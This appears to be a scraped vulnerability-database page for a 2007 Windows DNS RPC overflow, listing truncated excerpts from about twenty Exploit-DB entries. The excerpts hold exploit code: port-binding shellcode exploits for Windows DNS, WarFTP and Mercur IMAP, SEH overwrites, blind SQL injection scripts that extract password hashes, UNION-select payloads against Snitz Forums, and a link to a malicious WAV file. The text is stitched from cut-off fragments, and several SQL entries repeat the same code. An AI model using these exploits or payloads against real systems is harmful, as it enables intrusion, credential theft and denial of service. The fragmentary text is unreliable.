$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
Exploit-DB
Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow
exploitdb·2007-04-15·CVSS 10.0
CVE-2007-1748 [CRITICAL] Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow
Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow
---
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows DNS DnssrvQuery() Stack Overflow
* [CVE-2007-1748]
*
*
* Description:
* A vulnerability has been reported in Microsoft Windows, which can
* be exploited by malicious people to compromise a vulnerable system.
* The vulnerability is caused due to a boundary error in an RPC interface
* of the DNS service used for remote management of the service. This can
* be exploited to cause a stack-based buffer overflow via a specially
* crafted RPC request. The DnssrvQuery function is vulnerable to this stack
* overflow.
*
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Advanced Server
* Microsoft Windows 2000 Datacenter Server
*
Exploit-DB
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
exploitdb·2007-04-15
CVE-2007-1748 Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in https://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode +=
Exploit-DB
Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
exploitdb·2007-04-10
CVE-2007-2001 Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
---
/=======================================\
| Advisory :: Crea-Book [fr/en] |
| Date : 2007-04-10 |
| Last update : 2007-04-10 |
| |
+-------------------------------------------------------------------------------------------------------+
| Summary : 0] Description |
| 1] Vuln#1 : Administrative Access Bypass using basic SQL injection |
| 2] Vuln#2 : PHP Code Execution Weakness |
| 3] Links & Documentation |
\-------------------------------------------------------------------------------------------------------/
DESCRIPTION
This script is old but analysing it is a good way to understand some classic security holes in web
applications. It's just a good and fast training.
Let's g0 ...
VULNERABILITY #1 : ADMINI
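The advisory above describes an administrative login bypass in Crea-Book's admin/admin.php through the pseudo and passe parameters. As an added illustration, not the advisory's or Crea-Book's own code, the Python below reproduces the vulnerable pattern against an in-memory SQLite table and puts the parameterised fix beside it. The table name membres and its columns are assumptions (the page names only the script and the two parameters), and the sample row is constructed for the demo.

```python
import sqlite3

# Schema is an assumption: the advisory names admin/admin.php and the pseudo/passe
# parameters, not the table. Sample row constructed for the demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE membres (id INTEGER PRIMARY KEY, pseudo TEXT, passe TEXT)")
    conn.execute("INSERT INTO membres (pseudo, passe) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn

def vulnerable_login(conn, pseudo, passe):
    """CWE-89 pattern: request parameters spliced into the SQL string.
    Returns the matched pseudo, or None. 'Any row came back' is the whole auth check."""
    sql = ("SELECT pseudo FROM membres WHERE pseudo='" + pseudo
           + "' AND passe='" + passe + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def fixed_login(conn, pseudo, passe):
    """Same query with bound parameters: the input reaches the engine as data, never as SQL."""
    row = conn.execute(
        "SELECT pseudo FROM membres WHERE pseudo=? AND passe=?", (pseudo, passe)
    ).fetchone()
    return row[0] if row else None

# Tautology payload: closes the string, ORs in a true clause, and comments out the
# passe check. The targeted variant logs in as a chosen account instead of "whoever is first".
BYPASS_PSEUDO = "' OR 1=1 -- "
TARGETED_PSEUDO = "admin' -- "

def demo():
    conn = make_db()
    return {
        "legit_vuln": vulnerable_login(conn, "admin", "s3cret"),
        "wrong_pw_vuln": vulnerable_login(conn, "admin", "wrong"),
        "bypass_vuln": vulnerable_login(conn, BYPASS_PSEUDO, "x"),
        "targeted_vuln": vulnerable_login(conn, TARGETED_PSEUDO, "x"),
        "bypass_fixed": fixed_login(conn, BYPASS_PSEUDO, "x"),
        "targeted_fixed": fixed_login(conn, TARGETED_PSEUDO, "x"),
        "legit_fixed": fixed_login(conn, "admin", "s3cret"),
    }

if __name__ == "__main__":
    for name, who in demo().items():
        print(f"{name:15s} -> {who!r}")
```

What makes the bypass work is that the script treats "a row came back" as "authenticated", so any injected clause that makes the WHERE true for one row is a login. Escaping the quote (addslashes or magic_quotes_gpc) only helps when the injected value sits inside a quoted string; bound parameters fix the class of bug rather than this one payload.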
Exploit-DB
Wserve HTTP Server 4.6 - Long Directory Name Denial of Service
exploitdb·2007-04-05
CVE-2007-2367 Wserve HTTP Server 4.6 - Long Directory Name Denial of Service
---
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000].
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue
# execution and must now be terminated
# Exploit :
use LWP::UserAgent;
$unique = LWP::UserAgent->new;
$address = shift or die("Insert A Target");
$req = HTTP::Request->new(POST => "http://$addr
Exploit-DB
XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection
exploitdb·2007-04-04
CVE-2007-1962 XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection
---
XOOPS Module WF-Snippets
//'===============================================================================================
//'[Script Name: XOOPS Module WF-Snippets ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton')
Exploit-DB
XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
---
XOOPS Module XFsection
//'===============================================================================================
//'[Script Name: XOOPS Module XFsection ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton
Exploit-DB
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
exploitdb·2007-04-01
CVE-2005-1255 IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB
XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection
exploitdb·2007-04-01
CVE-2007-1805 XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection
---
XOOPS Module debaser
//'===============================================================================================
//'[Script Name: XOOPS Module debaser ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').val
Exploit-DB
Joomla! Component D4JeZine 2.8 - Blind SQL Injection
exploitdb·2007-03-27
CVE-2007-1776 Joomla! Component D4JeZine 2.8 - Blind SQL Injection
---
Joomla Component D4JeZine
//'===============================================================================================
//'[Script Name: Joomla Component D4JeZine ', 0) == -1) {
alert('False');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(1)") {
document.getElementById('buton').disabled = true;
islemlin
Exploit-DB
FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)
exploitdb·2007-03-22
CVE-2007-1645 FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)
---
#!/usr/bin/perl
# ===============================================================================================
# FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
# This exploit will open port 5555 on remote server. Connect it to
Exploit-DB
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
exploitdb·2007-03-21
CVE-2007-1579 Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis I settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow t
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
exploitdb·2007-03-14
CVE-2007-1567 WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x3
Exploit-DB
Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service
exploitdb·2007-03-13
CVE-2007-1492 Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/22938/info
Microsoft Windows is prone to a denial-of-service vulnerability.
A remote attacker may exploit this vulnerability by presenting a malicious WAV file to a victim user.
Successful exploits will result in excessive CPU consumption, effectively denying service.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29738.wav
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
exploitdb·2007-02-19
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem
Exploit-DB
Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
exploitdb·2007-02-16
CVE-2007-1023 Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
---
=================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N=================================
Bulan: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N=================================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X
Exploit-DB
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
exploitdb·2007-02-08
CVE-2007-0904 LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If
Exploit-DB
LushiWarPlaner 1.0 - 'register.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0864 LushiWarPlaner 1.0 - 'register.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If isl
Exploit-DB
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
exploitdb·2007-02-05
CVE-2007-0811 Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
---
Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. This bug will crash when executing a 'for' script.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
AmesianX, RC_No1 in powerhacker.net (
Exploit-DB
Microsoft Word 2000 - Code Execution
exploitdb·2007-02-03
CVE-2007-0515 Microsoft Word 2000 - Code Execution
---
############ use at your own risk *******
+ Title: Microsoft Word 2000 Unspecified Code Execution Vulnerability Exploit (0-day)
+ code by xCuter (BongGoo Kang - [email protected])
+ Critical: High Critical
+ Impact: MS Word 2000 -> Could Allow Arbitrary Command Execution
MS word 2003 -> Attempts against Word 2003/XP will consume all CPU resources and will cause a denial of service
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
+ Tested Software: Microsoft(R) Word 2000 (9.0.2720)
+ Solution: Not Patched (zero-day)
+ Description:
When a user opens a specially crafted Word file using a malformed string,
it may corrupt system memory in such a way that an attacker could execute arbitrary code
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
exploitdb·2007-01-17
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
---
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITRARY REMOTE CODE EXECUTION (CALC.exe)
# You can put your own shellcode to spawn a shell
# Thursday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! [email protected]
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit You will get "Ca
No writeups or analysis indexed.
References
http://secunia.com/advisories/24862
http://www.osvdb.org/34816
http://www.vupen.com/english/advisories/2007/1344
https://exchange.xforce.ibmcloud.com/vulnerabilities/33555
https://www.exploit-db.com/exploits/3701
2007-04-12
Published